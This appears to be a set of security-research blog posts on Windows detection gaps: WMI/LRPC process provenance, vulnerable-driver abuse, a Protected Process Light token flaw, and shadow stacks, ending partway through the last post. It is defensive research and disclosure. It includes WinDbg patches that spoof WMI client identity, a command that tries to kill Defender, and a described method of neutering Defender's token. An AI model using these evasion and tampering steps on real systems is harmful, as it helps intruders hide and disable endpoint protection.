Adversaries currently utilize RPC’s client-server architecture to obfuscate their activities on a host – including COM and WMI which are both RPC-based. For example, a number of local RPC servers will happily launch processes on behalf of a malicious client - and that form of defense evasion is difficult to flag as malicious without being able to correlate it with the client.

The above annotated screenshot is the logical process tree after a Microsoft Word macro called three COM objects, each exposing a ShellExecute interface and also the WMI Win32\_Process::Create method. The WMI call has specialized telemetry that can reconstruct that Microsoft Word initiated the process creation (the blue arrow), but the COM calls don’t (the red arrows). So defenders have no visibility that Microsoft Word made a COM call over an RPC call to spawn PowerShell elsewhere on the system.
The defender is left with a challenge to interpretation because of this lack of context - Word spawning PowerShell is a red flag, but is Explorer spawning PowerShell malicious, or simply user behavior?
RPC will typically use LRPC as the transport for inter-process communication. Using process creation as a case study, this research will outline the evasion-detection arms race to date, describe the weaknesses in some current detection approaches and then follow the quest for a generic approach to LRPC-based evasion.
A Brief History of Child Process Evasion
It is often very beneficial for adversaries to spawn child processes during intrusions. Using legitimate pre-installed system tools to achieve your aims saves on capability development time and can potentially evade security instrumentation by providing a veneer of legitimacy for the activity.
However, for the activity to look plausibly legitimate, the parent process also needs to seem plausible. The classic counter-example is that Microsoft Word spawning PowerShell is highly anomalous. In fact, Elastic SIEM includes a prebuilt rule to detect suspicious MS Office child processes and Elastic Endpoint will also prevent malicious execution. As documented in the Elastic Global Threat Report, suspicious parent/child relationships was one of the three most common defense evasion techniques used by threats in 2022.
Endpoint Protection Platform (EPP) products could prevent the most egregious process parent relationships, but it was the rise of Endpoint Detection and Response (EDR) approaches with pervasive process start logging and the ability to retrospectively hunt that established a scalable approach to anomalous process tree detection.
Adversaries initially pivoted to evasions using a Win32 API feature introduced in Windows Vista to support User Account Control (UAC) that allows a process to specify a different logical parent process to the real calling process. However, endpoint security could still identify the real parent process based on the calling process context during the process creation notification callback, and detection rule coverage was quickly re-established.
New evasion techniques evolved in response, and a common method currently leveraged by adversaries is to indirectly spawn child processes via RPC – including DCOM and WMI which are both RPC-based. RPC can be either inter-host or simply inter-process. The latter is oxymoronically called Local Remote Procedure Call (LRPC).
The most well-known of these was the Win32\_Process::Create WMI method. In order to detect this, Microsoft appears to have explicitly added a new Microsoft-Windows-WMI-Activity ETW event in Windows 10 1809. The new event 23 included the client process id - the missing data point needed to associate the activity with a requesting client.
Unfortunately adversaries were quickly able to pivot to alternate process spawning out-of-process RPC servers such as MMC20.Application::ExecuteShellCommand. Waiting for Microsoft to add telemetry to dual-purpose out-of-process RPC servers one-by-one wasn’t going to be a viable detection approach, so last year we set out on a side quest to generically associate LRPC server actions with the requesting LRPC client process.
Detecting LRPC provenance
The majority of previous public RPC telemetry research has focused on inter-host lateral movement – typically spawning a process on a remote host. For example: - Lateral Movement using the MMC20.Application COM Object- Lateral Movement via DCOM: Round 2- Endpoint Detection of Remote Service Creation and PsExec - Utilizing RPC Telemetry- Detecting Lateral Movement techniques with Elastic - Stopping Lateral Movement via the RPC Firewall
The ultimate advice for defenders is typically to monitor RPC network traffic for anomalies or, better yet, to block unnecessary remote access to RPC interfaces with RPC Filters (part of the Windows Filtering Platform) or specific RPC methods with 3rd party tooling like RPC Firewall.
Unfortunately these approaches don’t work when the adversary uses RPC to spawn a process elsewhere on the same host. In this case, the RPC transport is typically ALPC - monitoring and filtering at the network layer does not then apply.
On the host, detection engineers typically look to leverage telemetry from the inbuilt Event Tracing (including EventLog) in the first instance. If this proves insufficient, then they can investigate custom approaches such as user-mode function hooking or mini-filter drivers.
In the RPC case, Microsoft-Windows-RPC ETW events are very useful for identifying anomalous behaviours.
Especially: - Event 5 - RpcClientCallStart (GUID InterfaceUuid, UInt32 ProcNum, UInt32 Protocol, UnicodeString NetworkAddress, UnicodeString Endpoint, UnicodeString Options, UInt32 AuthenticationLevel, UInt32 AuthenticationService, UInt32 ImpersonationLevel) - Event 6 - RpcServerCallStart (GUID InterfaceUuid, UInt32 ProcNum, UInt32 Protocol, UnicodeString NetworkAddress, UnicodeString Endpoint, UnicodeString Options, UInt32 AuthenticationLevel, UInt32 AuthenticationService, UInt32 ImpersonationLevel)
Additionally, RpcClientCallStart is generated by the client and RpcServerCallStart by the server so the ETW headers will provide the client and server process ids respectively. Further, there is a 1:1 mapping between endpoint addresses and server process ids. So the server process can be inferred from the RpcClientCallStart event.
The RPC interface UUID and Procedure number combined with the caller details are (usually) sufficient to identify intent. For example, RPC interface UUID {367ABB81–9844–35F1-AD32–98F038001003} is the Service Control Manager Remote Protocol which exposes the ability to configure Windows services. The 12th procedure in this interface is RCreateServiceW which notoriously is the method that PsExec uses to execute processes on remote systems.
For endpoint security vendors, however, there are a few issues to address before scalable robust Microsoft-Windows-RPC detections would be possible: 1. RPC event volumes are significant 2. There isn't an obvious mechanism to strongly correlate a client call with the resultant server call 3. There isn’t an obvious mechanism to strongly correlate a server call with the resultant server behavior
Let’s address these three issues one by one.
LRPC event volumes
There are thousands of LRPC events each second – and most of them are uninteresting. To address the LRPC event volume concern, we could limit the events to just those RPC events that are inter-process (including inter-host). However, this immediately leads to the second concern. We need to identify the client of each server call in order to reduce event volumes down to just those which are inter-process.
Correlating RPC server calls with their clients

Modern Windows RPC has roughly three transports: - TCP/IP (nacn_ip_tcp, nacn_http, ncadg_ip_udp and nacn_np over SMB) - inter-process Named Pipes (direct nacn_np) - inter-process ALPC (ncalrpc)
The RpcServerCallStart event alone is not sufficient to determine if the call was inter-process. It needs to be correlated against a preceding RpcCientCallStart event, and this correlation is unfortunately weak. At best you can identify a pair of RpcServerCall start/stop events that are bracketed by a pair of RpcClientCall events with the same parameters. (Note - for performance reasons, ETW events generated from different threads may arrive out of order). This means that you need to maintain a holistic RPC state - which creates an on-host storage and processing volume concern in order to address the event volume concern.
More importantly though, the RpcClientCallStart events are generated in the client process where an adversary has already achieved execution and therefore can be intercepted with very little effort. There is little point to implementing a detection for something so trivial to circumvent, especially when there are more effective options.
Ideally, the RPC server would access the client details and directly log this information. Unfortunately, the ETW events don’t include this information - which is not surprising since one of the RPC design goals was simplification through abstraction. The RPC runtime (allegedly) can be configured via Group Policy to do exactly this, though. It can store RPC State Information which can then be used during debugging to identify the client caller from the server thread. Unfortunately the Windows XP era documentation didn’t immediately work for Windows 10.
It did provide a rough outline describing how to address the first two problems: reducing event volumes and correlating server calls to client processes. It is possible to hook the RPC runtime in all RPC servers, account for the various transports, and then log or filter inter-process RPC events only. (This is likely akin to how RPC Firewallhandles network RPC - just with local endpoints).
Correlating RPC server calls and resultant behavior
The next problem was how to correctly attribute a specific server call to the resultant server behaviour. On a busy server, how could we tie an opaque call to the ExecuteShellCommand method to a specific process creation event? And what if the call came from script-based malware and was further wrapped under a method like IDispatch::Invoke?
We didn’t want to have to inspect the RPC parameter blob and individually implement parsing support for each abusable RPC method.
Introducing ETW’s ActivityId
Thankfully, Microsoft had already thought of this scenario and provides ETW tracing guidance to developers.

They suggest that developers generate and propagate a unique 128-bit ActivityId between related ETW events to enable end-to-end tracing scenarios. This is typically handled automatically by ETW for events generated on the same thread as the value is stored in thread local storage. However, the developer must manually propagate this ID to related activities performed by other threads… or processes. As long as the RPC Runtime and all Microsoft RPC servers had followed ETW tracing best practices, we should finally have the end-to-end correlation we want!
It was time to break out a decompiler (we like Ghidra but there are many options) and inspect rpcrt4.dll. By looking at the first parameter passed to EventRegister calls, we can see that there are three ETW GUIDs in the RPC runtime. These GUIDs are defined in a contiguous block and helpfully came with public symbols.

These GUIDs correspond to Microsoft-Windows-RPC, Microsoft-Windows-Networking-Correlation and Microsoft-Windows-RPC-Events respectively. Further, the RPC runtime helpfully wraps calls to EventWrite in just two places.
The first call is in McGenEventWrite\_EtwEventWriteTransfer and looks like this:
`EtwEventWriteTransfer` (RegHandle, EventDescriptor, NULL, NULL, UserDataCount, UserData);

The NULL parameters mean that ActivityId will always be the configured per-thread ActivityId and RelatedActivityId will always be excluded in events logged by this code path.
The second call is in EtwEx\_tidActivityInfoTransfer and looks like this:
`EtwEventWriteTransfer` (Microsoft_Windows_Networking_CorrelationHandle, EventDescriptor, ActivityId, RelatedActivityId, UserDataCount, UserData);

This means that RelatedActivityId will only ever be logged in Microsoft-Windows-Networking-Correlation events. RPC Runtime ActivityId s are (predominantly) created within a helper function that ensures that this correlation is always logged.

Decompilation also revealed that the RPC runtime allocates ETW ActivityId s by calling UuidCreate , which generates a random 128-bit value. This is done in locations such as NdrAysncClientCall and HandleRequest. In other words, the client and server both individually allocate ActivityId s. This isn’t unsurprising because the DCE/RPC specification doesn’t seem to include a transaction id or similar construct which would allow the client to propagate an ActivityId to the server. That’s okay though: we’re only currently missing the correlation between server call and the resultant behaviour. Also we don’t want to trust any potentially tainted client-supplied information.
So now we know exactly how RPC intends to correlate activities triggered by RPC calls- by setting the per-thread ETW ActivityId and by logging RPC ActivityId correlations to Microsoft-Windows-Networking-Correlation. The next question is whether the Microsoft RPC interfaces that support dual-purpose activities, such as process spawning, propagate the ActivityId appropriately.
We looked at the execution traces for the four indirect process creation examples from our initial case study. In each one, the RPC request was received on one thread, a second thread handled the request and a third thread spawned the process. Other than the timing, there appeared to be no possible mechanism to link the activities.
Unfortunately, while the RPC subsystem is well behaved, most RPC servers aren't – though this likely isn't entirely their fault. The ActivityId is only preserved per-thread so if the server uses a worker thread pool (as per Microsoft’s RPC scalability advice) then the causality correlation is implicitly broken.
Further, kernel ETW events seem to universally log an ActivityId of {00000000-0000-0000-0000-000000000000} – even when the thread has a (user-mode) ActivityId configured. It is likely that the kernel implementation of EtwWriteEvent simply does not query the ActivityId which is stored in user-mode thread local storage.
This observation about kernel events is a showstopper for a generic approach based around ETW. Almost all of the interesting resultant server behaviors (process, registry, file etc) are logged by kernel ETW events.
A new approach was necessary. It isn’t scalable to investigate individual ETW providers in dual-purpose RPC servers. (Though the Microsoft.Windows.ShellExecute TraceLogging provider looked interesting). What would Microsoft do?
What would Microsoft do?
More specifically, how does Microsoft populate the ClientProcessId in the Microsoft-Windows-WMI-Activity ETW event 23 (aka Win32\_Process::Create )?
`task_023` (UnicodeString CorrelationId, UInt32 GroupOperationId, UInt32 OperationId, UnicodeString Commandline, UInt32 CreatedProcessId, UInt64 CreatedProcessCreationTime, UnicodeString ClientMachine, UnicodeString ClientMachineFQDN, UnicodeString User, UInt32 ClientProcessId, UInt64 ClientProcessCreationTime, Boolean IsLocal)

Unlike RPC, WMI natively supports end-to-end tracing via a CorrelationId which is a GUID that the WMI client passes to the server at the WMI layer so that WMI operations can be associated. However, for security use cases, we shouldn’t blindly trust client-supplied information for reasons previously mentioned.
But how was Microsoft determining the process id to log and was their approach something that could be replicated for other RPC Servers – possibly via an RPC server runtime hook?
We needed to find out where the data in that field came from. ETW conveniently provides the ability to record a stack trace when an event is generated and the Sealighter tool conveniently exposes this capability. Sealighter illustrates which specific ETW Write function is being called from which process.
In this case, the event was actually being written by ntdll!EtwEventWrite in the WMI Core Service (svchost.exe -k netsvcs -p -s Winmgmt) – not in the WMI Provider Host (WmiPrvSE.exe).

Putting a breakpoint on PublishWin32ProcessCreation , we see via parameter value inspection that the ClientProcessId is passed (on the stack) as the 10th parameter. We can then look at InspectWin32ProcessCreateExecution to determine how the value that is passed in is determined.
A roughly tidied Ghidra decompilation of InspectWin32ProcessCreateExecution might resemble this:

We can see that the client process id comes from the CWbemNamespace object. Searching for reference to this structure field, we find that it is only set in CWbemNamespace::Initialize. Our earlier stack trace started in wbemcore!CCoreQueue and this initialization appears to have occurred prior to queuing. So we could statically search for all locations where the initialization occurs or dynamically observe the actual code paths taken.
We know that this activity is being initiated over RPC, so one approach would be to place breakpoints on RPC send/receive functions in the client and server. An alternative might be to fire up Wireshark and examine the packet capture of the entire interaction when it occurs in cleartext over the network. We learned somewhat late in our research that Microsoft had excellent documentation for the WMI Protocol Initialization that explained much of this and might have saved a little time.
We took the first approach. The second parameter to InspectWin32ProcessCreateExecution is an IWbemContext – which allows the caller to provide additional information to providers. This is how the parameters to Win32\_Process::Create are being passed. What if the first parameter was related to the WMI Client passing additional context to the WMI Core?
IWbemLevel1Login::NTLMLogin stood out in the call traces as a good place to start looking.

And right next to its COM interface UUID was IWbemLoginClientID[Ex] which had a very interesting SetClientInfo call, which was documented on MSDN:

The WMI client calls wbemprox!SetClientIdentity which looks roughly like this:

IWbemLoginClientIDEx is currently undocumented, but we can infer the parameters from the values passed.
At this point, it looks like the client process is passing ClientMachineName , ClientMachineFQDN , ClientProcessId and ClientProcessCreationTime to the WMI Core. We can confirm this by changing the values and seeing if the ETW event logged by the WMI Core changes.
Using WinDbg, we set up a couple quick patches to the WMI client process and then spawned a process via WMI:
windbg> bp wbemprox!SetClientIdentity+0xff "eu @rdx \"SPOOFED....\"; gc"
windbg> bp wbemprox!SetClientIdentity+0x1c4 "r r9=0n1337; eu @r8 \"SPOOFED.COM\"; gc"
PS> ([wmiclass]"ROOT\CIMv2:Win32_Process").Create("calc.exe")

Using SilkETW (or another ETW capture mechanism), we see the following event from the server process:

The server is blindly reporting the values provided by the client. This means that this event cannot be relied upon for un-breaking WMI process provenance trees as the adversary can control the client process id. Falsely reporting this information would be an interesting defense evasion, and a tough one to identify reliably.
Further, a remote adversary can actually pass in a ClientMachine name equal to the local hostname and this WMI event will mistakenly log IsLocal as true. (See the earlier decompilation of InspectWin32ProcessCreateExecution ). This will make the event seem like a suspicious local execution rather than lateral movement, and represents another defence evasion opportunity.
So, this isn’t an approach that other RPC servers should follow after all.
Conclusion
In trying to generically solve LRPC provenance, we unfortunately demonstrate that the one existing LRPC provenance data point is unreliable. This has been reported to Microsoft where it was assessed as a next-version candidate bug that will be evaluated for future releases.
Our fervent hope is that the ultimate solution involves the creation of a documented API that allows a server LRPC thread to determine the client thread of a connection. This would provide endpoint security products with a reliable mechanism to identify operations being proxied through LRPC calls in an attempt to hide their origin.
More generally though, this research highlights the need for defenders to have a detailed understanding of data provenance. It is necessary but not sufficient to know that the data was logged by a trustworthy source such as the kernel or a server process. In addition, you must also understand whether the data was intrinsic to the event or provided by a potentially untrustworthy client. Otherwise adversaries will exploit the gaps.



Stopping Vulnerable Driver Attacks
Wed, 01 Mar 2023 00:00:00 GMT
Key takeaways

Ransomware actors are leveraging vulnerable drivers to tamper with endpoint security products.
Elastic Security released 65 YARA rules to detect vulnerable driver abuse.
Elastic Endpoint (8.3+) protects users from this threat.

Background
In 2018, Gabriel Landau and Joe Desimone presented a talk at Black Hat covering the evolution of kernel mode threats on Windows. The most concerning trend was towards leveraging known good but vulnerable drivers to gain kernel mode execution. We showed this was practical, even with hypervisor mode integrity protection (HVCI) and Windows Hardware Quality Labs (WHQL) signing requirement enabled. At the time, the risk to everyday users was relatively low, as these techniques were mostly leveraged by advanced state actors and top red teams.
Fast forward to 2022, and attacks leveraging vulnerable drivers are a growing concern due to a proliferation of open source tools to perform these attacks. Vulnerable drivers have now been used by ransomware to terminate security software before encrypting the system. Organizations can reduce their risk by limiting administrative user permissions. However, it is also imperative for security vendors to protect the user-to-kernel boundary because once an attacker can execute code in the kernel, security tools can no longer effectively protect the host. Kernel access gives attackers free rein to tamper or terminate endpoint security products or inject code into protected processes.
This post includes a primer on kernel mode attacks, along with Elastic’s recommendations for securing users from kernel attacks leveraging vulnerable drivers.
Attack flow
There are a number of flaws in drivers that can allow attackers to gain kernel mode access to fully compromise the system and remain undetected. Some of the most common flaws include granting user mode processes write access to virtual memory, physical memory, or model-specific registers (MSR). Classic buffer overflows and missing bounds checks are also common.
A less common driver flaw is unrestricted handle duplication. While this may seem like innocuous functionality at first glance, handle duplication can be leveraged to gain full kernel code execution by user mode processes. For example, the latest Process Explorer driver by Microsoft exposes such a function.
An attacker can leverage this vulnerability to duplicate a sensitive handle to raw physical memory present in the System (PID 4) process.

After obtaining the cr3 value, the attacker can walk the page tables to convert virtual kernel addresses to their associated physical addresses. This grants an arbitrary virtual read/write primitive, which attackers can leverage to easily tamper with kernel data structures or execute arbitrary kernel code. On HVCI-enabled systems, thread control flow can be hijacked to execute arbitrary kernel functions as shown below.

We reported this issue to Microsoft in the vulnerable driver submission portal on July 26, but as of this writing have not received a response. We hope Microsoft will consider this a serious security issue worth addressing. Ideally, they will release a fixed version without the vulnerable IOCTLs and include it in the default HVCI blocklist. This would be consistent with the blocking of the ProcessHacker (now known as System Informer) driver for the same flaw.
Blocklisting
Blocklisting prevents known vulnerable drivers from loading on a system, and is a great first step to the vulnerable driver problem. Blocklisting can raise the cost of kernel attacks to levels out of reach for some criminal groups, while maintaining low false positive rates. The downside is it does not stop more advanced groups, which can identify new, previously-unknown, vulnerable drivers.
Microsoft maintains a catalog of known exploited or malicious drivers, which should be a minimum baseline. This catalog consists of rules using various combinations of Authenticode hash, certificate hash (also known as TBS), internal file name, and version. The catalog is intended to be used by Windows Defender Application Control (WDAC). We used this catalog as a starting point for a more comprehensive list using the YARA community standard.
To expand on the existing list of known vulnerable drivers, we pivoted through VirusTotal data with known vulnerable import hashes and other metadata. We also combed through public attack tooling to identify additional vulnerable drivers. As common practice for Elastic Security, we made our blocklist available to the community. In Elastic Endpoint Security version 8.3 and newer, all drivers are validated against the blocklist in-line before they are allowed to load onto the system (shown below).

Allowlisting
One of the most robust defenses against this driver threat is to only allow the combination of driver signer, internal file name, version, and/or hashes, which are known to be in use. We recommend organizations be as strict as feasible. For example, do not blanket trust all WHQL signed drivers. This is the classic application control method, albeit focusing on drivers. An organization’s diversity of drivers should be more manageable than the entirety of user mode applications. Windows Defender Application Control (WDAC) is a powerful built-in feature that can be configured this way. However, the learning curve and maintenance costs may still be too high for organizations without well-staffed security teams. To reap most of the benefits of the allowlisting approach, but reduce the cost of implementation to the users (ideally to blocklisting levels), we recommend two approaches in tandem: behavior control and alert on first seen.
Behavior control
The concept behind behavior control is to produce a more manageable set of allowlistable behavior choke points that can be tuned for high confidence. For example, we can create a behavior control around which applications are allowed to write drivers to disk. This may start with a relatively loose and simple rule:

From there, we can allowlist the benign applications that are known to exhibit this behavior. Then we receive and triage hits, tune the rule until it becomes high confidence, and then ship as part of our malicious behavior protection. Elastic SIEM users can use the same technique to create custom Detection Engine rules tuned specifically for their environment.
First seen
Elastic Security in 8.4 adds another powerful tool that can be used to identify suspicious drivers. This is the “New Terms” rule type, which can be used to create an alert when a term (driver hash, signer, version, internal file name, etc) is observed for the first time.

This empowers security teams to quickly surface unusual drivers the first time they’re seen in their environment. This supports a detection opportunity for even previously unknown vulnerable drivers or other driver-based adversary tradecraft.

Conclusion
Vulnerable driver exploitation, once relegated to advanced adversaries, has now proliferated to the point of being used in ransomware attacks. The time for the security community to come together and act on this problem is now. We can start raising the cost by collaborating on blocklists as a community. We should also investigate additional detection strategies such as behavior control and anomaly detection to raise the cost further without requiring significant security expertise or resources to achieve.



Sandboxing Antimalware Products for Fun and Profit
Tue, 21 Feb 2023 00:00:00 GMT
This article demonstrates a flaw that allows attackers to bypass a Windows security mechanism which protects anti-malware products from various forms of attack. This is of particular interest because we build and maintain two anti-malware products that benefit from this protection.
Protected Anti-Malware Services
Windows 8.1 introduced a concept of Protected Antimalware Services. This enables specially-signed programs to run such that they are immune from tampering and termination, even by administrative users. Microsoft’s documentation (archived) describes this as:

In Windows 8.1, a new concept of protected service has been introduced to allow anti-malware user-mode services to be launched as a protected service. After the service is launched as protected, Windows uses code integrity to only allow trusted code to load into the protected service. Windows also protects these processes from code injection and other attacks from admin processes.

The goal is to prevent malware from instantly disabling your antivirus and then running amok. For the rest of this article, we call them Protected Process Light (PPL). For more depth, Alex Ionescu goes into great detail on protected processes in his talk at NoSuchCon 2014.
To be able to run as a PPL, an anti-malware vendor must apply to Microsoft, prove their identity, sign binding legal documents, implement an Early Launch Anti-Malware (ELAM) driver, run it through a test suite, and submit it to Microsoft for a special Authenticode signature. It is not a trivial process. Once this process is complete, the vendor can use this ELAM driver to have Windows protect their anti-malware service by running it as a PPL.
You can see PPL in action yourself by running the following from an elevated administrative command prompt on a default Windows 10 install:
Protected Process Light in Action
C:\WINDOWS\system32>whoami
nt authority\system

C:\WINDOWS\system32>whoami /priv | findstr "Debug"
SeDebugPrivilege                Debug programs                    Enabled

C:\WINDOWS\system32>taskkill /f /im MsMpEng.exe
ERROR: The process "MsMpEng.exe" with PID 2236 could not be terminated.
Reason: Access is denied.


As you can see here, even a user running as SYSTEM (or an elevated administrator) with SeDebugPrivilege cannot terminate the PPL Windows Defender anti-malware Service (MsMpEng.exe). This is because non-PPL processes like taskkill.exe cannot obtain handles with the PROCESS_TERMINATE access right to PPL processes using APIs such as OpenProcess.
In summary, Windows attempts to protect PPL processes from non-PPL processes, even those with administrative rights. This is both documented and implemented. That being said, with PROCESS_TERMINATE blocked, let’s see if there are other ways we can interfere with it instead.
Windows Tokens
A Windows token can be thought of as a security credential. It says who you are and what you’re allowed to do. Typically when a user runs a process, that process runs with their token and can do anything the user can do. Some of the most important data within a token include:

User identity
Group membership (e.g. Administrators)
Privileges (e.g. SeDebugPrivilege)
Integrity level

Tokens are a critical part of Windows authorization. Any time a Windows thread accesses a securable object, the OS performs a security check. It compares the thread’s effective token against the security descriptor of the object being accessed. You can read more about tokens in the Microsoft access token documentation and the Elastic blog post that introduces Windows tokens.
Sandboxing Tokens
Some applications, such as web browsers, have been repeated targets of exploitation. Once an attacker successfully exploits a browser process, the exploit payload can perform any action that the browser process can perform. This is because it shares the browser’s token.
To mitigate the damage from such attacks, web browsers have moved much of their code into lower-privilege worker processes. This is typically done by creating a restricted security context called a sandbox. When a sandboxed worker needs to perform a privileged action on the system, such as saving a downloaded file, it can ask a non-sandboxed “broker” process to perform the action on its behalf. If the sandboxed process is exploited, the goal is to limit the payload’s ability to cause harm to only resources accessible by the sandbox.
While modern sandboxing involves several components of OS security, one of the most important is a low-privilege, or restricted, token. New sandbox tokens can be created with APIs such as
CreateRestrictedToken
. Sometimes a sandboxed process needs to lock itself down after performing some initialization. The
AdjustTokenPrivileges
and
AdjustTokenGroups
APIs allow this adjustment. These APIs enable privileges and groups to be “forfeit” from an existing process’s token in such a way that they cannot be restored without creating a new token outside the sandbox.
One commonly used sandbox today is part of Google Chrome. Even some security products are getting into sandboxing these days.
Accessing Tokens
Windows provides the OpenProcessTokenAPI to enable interaction with process tokens. MSDN states that one must have the PROCESS_QUERY_INFORMATION right to use OpenProcessToken. Since a non-protected process can only get PROCESS_QUERY_LIMITED_INFORMATION access to a PPL process (note the LIMITED), it is seemingly impossible to get a handle to a PPL process’s token. However, MSDN is incorrect in this case. With only PROCESS_QUERY_LIMITED_INFORMATION, we can successfully open the token of a protected process. James Forshawexplains this documentation discrepancy in more depth, showing the underlying
de-compiled kernel code.
Tokens are themselves securable objects. As such, regular access checks still apply. The effective token of the thread attempting to access the token is checked against the security descriptor of the token being accessed for the requested access rights (TOKEN_QUERY, TOKEN_WRITE, TOKEN_IMPERSONATE, etc). For more detail about access checks, see the Microsoft article, “How Access Checks Work.”
The Attack
Process Hacker provides a nice visualization of token security descriptors. Taking a look at Windows Defender’s (MsMpEng.exe) token, we see the following Discretionary Access Control List (DACL):

Note that the SYSTEM user has full control over the token. This means, unless some other mechanism is protecting the token, a thread running as SYSTEM can modify the token. When such modification is possible, it violates the desired “PPL is protected from administrators” design goal.
Demo
Alas, there is no other mechanism protecting the token. Using this technique, an attacker can forcefully remove all privileges from the MsMpEng.exe token and reduce it from system to untrusted integrity. Being nerfed to untrusted integrity prevents the victim process from accessing most securable resources on the system, quietly incapacitating the process without terminating it.

In this video, the attacker could have further restricted the token, but the privilege and integrity changes were sufficient to prevent MsMpEng.exe from detecting and blocking a Mimikatz execution. We felt this illustrated a valid proof of concept.
Defense
Newer versions of Windows include an undocumented feature called “trust labels.” Trust labels are part of the System Access Control List (SACL), an optional component of every security descriptor. Trust labels allow Windows to restrict specific access rights to certain types of protected processes. For example, Windows protects the \KnownDlls object directory from modification by malicious administrators using a trust label. We can see this with WinObjEx64:

Like \KnownDlls, tokens are securable objects, and thus it is possible to protect them against modification by malicious administrators. Elastic Security does this, in fact, and is immune to this attack, by denying TOKEN_WRITE access to processes with a trust label below “Anti-Malware Light.” Because this protection is applied at runtime, however, there is still a brief window of vulnerability until it can apply the trust label.
Ideally, Windows would apply such a trust label to each PPL process’s token as it is created. This would eliminate the race condition and fix the vulnerability in the PPL mechanism. There is precedent. With a kernel debugger, we can see that Windows is already protecting the System process’ token on Windows (21H1 shown below) with a trust label:
1: kd> dx -r1 (((nt!_OBJECT_HEADER*)((@$cursession.Processes[0x4]->KernelObject->Token->Object - sizeof(nt!_OBJECT_HEADER))  & ~0xf))->SecurityDescriptor & ~0xf)
(((nt!_OBJECT_HEADER*)((@$cursession.Processes[0x4]->KernelObject->Token->Object - sizeof(nt!_OBJECT_HEADER))  & ~0xf))->SecurityDescriptor & ~0xf) : 0xffffe00649c46c20
1: kd> !sd 0xffffe00649c46c20
->Revision: 0x1
->Sbz1    : 0x0
->Control : 0x8814
            SE_DACL_PRESENT
            SE_SACL_PRESENT
            SE_SACL_AUTO_INHERITED
            SE_SELF_RELATIVE
->Owner   : S-1-5-32-544
->Group   : S-1-5-32-544
->Dacl    :
->Dacl    : ->AclRevision: 0x2
->Dacl    : ->Sbz1       : 0x0
->Dacl    : ->AclSize    : 0x1c
->Dacl    : ->AceCount   : 0x1
->Dacl    : ->Sbz2       : 0x0
->Dacl    : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl    : ->Ace[0]: ->AceFlags: 0x0
->Dacl    : ->Ace[0]: ->AceSize: 0x14
->Dacl    : ->Ace[0]: ->Mask : 0x000f01ff
->Dacl    : ->Ace[0]: ->SID: S-1-5-18

->Sacl    :
->Sacl    : ->AclRevision: 0x2
->Sacl    : ->Sbz1       : 0x0
->Sacl    : ->AclSize    : 0x34
->Sacl    : ->AceCount   : 0x2
->Sacl    : ->Sbz2       : 0x0
->Sacl    : ->Ace[0]: ->AceType: SYSTEM_MANDATORY_LABEL_ACE_TYPE
->Sacl    : ->Ace[0]: ->AceFlags: 0x0
->Sacl    : ->Ace[0]: ->AceSize: 0x14
->Sacl    : ->Ace[0]: ->Mask : 0x00000001
->Sacl    : ->Ace[0]: ->SID: S-1-16-16384

->Sacl    : ->Ace[1]: ->AceType: SYSTEM_PROCESS_TRUST_LABEL_ACE_TYPE
->Sacl    : ->Ace[1]: ->AceFlags: 0x0
->Sacl    : ->Ace[1]: ->AceSize: 0x18
->Sacl    : ->Ace[1]: ->Mask : 0x00020018
->Sacl    : ->Ace[1]: ->SID: S-1-19-1024-8192


The SYSTEM_PROCESS_TRUST_LABEL_ACE_TYPE access control entry limits access to READ_CONTROL, TOKEN_QUERY, and TOKEN_QUERY_SOURCE (0x00020018) unless the caller is a WinTcb protected process (SID S-1-19-1024-8192). That SID can be interpreted as follows:

1: Revision 1
19: SECURITY_PROCESS_TRUST_AUTHORITY
1024:
SECURITY_PROCESS_PROTECTION_TYPE_FULL_RID
8192:
SECURITY_PROCESS_PROTECTION_LEVEL_WINTCB_RID

Mitigation
Alongside this article, we are releasing an update to the PPLGuard proof-of-concept that protects all running anti-malware PPL processes against this attack. It includes example code that anti-malware products can employ to protect themselves. Here it is in action, protecting Defender:

Disclosure
We disclosed this vulnerability and proposed fixes to the Microsoft Security Response Center (MSRC) on 2022-01-05. They responded on 2022-01-24 that they have classified it as moderate severity, and will not address it with a security update. However, they may address it in a future version of Windows.
Conclusion
In this article, we disclosed a flaw in the Windows Protected Process Light (PPL) mechanism. We then demonstrated how malware can use this flaw to neutralize PPL anti-malware products. Finally, we showed a simple ACL fix (with sample code) that anti-malware products can employ to defend against this attack. Elastic Security already incorporates this fix, but we hope that Windows implements it (or something equivalent) by default in the near future.



Finding Truth in the Shadows
Thu, 26 Jan 2023 00:00:00 GMT
Microsoft has begun rolling out user-mode Hardware Stack Protection (HSP) starting in Windows 10 20H1. HSP is an exploit mitigation technology that prevents corruption of return addresses on the stack, a common component of code reuse attacks for software exploitation. Backed by silicon, HSP uses Intel's Control flow Enforcement Technology (CET) and AMD's Shadow Stack, combined with software support described in great detail by Yarden Shafir and Alex Ionescu. Note that the terms HSP and CET are often used interchangeably.
HSP creates a shadow stack, separate from the regular stack. It is read-only in user mode, and consists exclusively of return addresses. Contrast this with the regular stack, which interleaves data with return addresses, and must be writable for applications to function correctly. Whenever a CALL instruction executes, the current instruction pointer (aka return address) is pushed onto both the regular and shadow stacks. Conversely, RET instructions pop the return address from both stacks, generating an exception if they mismatch. In theory, ROP attacks are mitigated because attackers can't write arbitrary values to the read-only shadow stack, and changing the Shadow Stack Pointer (SSP) is a privileged operation, making pivots impossible.
Today we’re going to discuss three additional benefits that HSP brings, beyond the intended exploit mitigation capability, then go into some limitations.
Debugging
Although designed as an exploit mitigation, HSP provides useful data for other purposes. Modern versions of WinDbg will display a hint to the user that they can use SSP as an alternate way to recover a stack trace. This can be very useful when debugging stack corruption bugs that overwrite return addresses, because the shadow stack is independent. It's also useful in situations where the stack unwind data is unavailable.
For example, see the WinDbg output below for a process memory dump. The k command displays a regular stack trace. dps @ssp resolves all symbols it can find, starting at SSP - this is essentially a shadow stack trace. Note how the two stack traces are identical except for the first frame:

Performance
Kernel mode components such as EDR and ETW often capture stack traces to provide additional context to each event. On x64 platforms, a stack walk entails capturing the thread’s context, then looking up a data structure for each frame that enables the walker to "unwind" it and find the next frame. These lookups were slow enough that Microsoft saw fit to construct a multi-tier cache system when they added x64 support. You can see the traverse/unwind process approximated here in ReactOS, sans cache.
Given that the entire shadow stack likely resides on a single page and no unwinding is required, shadow stack walking is probably more performant than traditional stack walking, though this has yet to be proven.
Detection
The shadow stack provides an interesting detection opportunity. Adversaries can use techniques demonstrated in ThreadStackSpoofer and CallStackSpoofer to obfuscate their presence against thread stack scans (e.g. StackWalk64) and inline stack traces like Sysmon Open Process events.
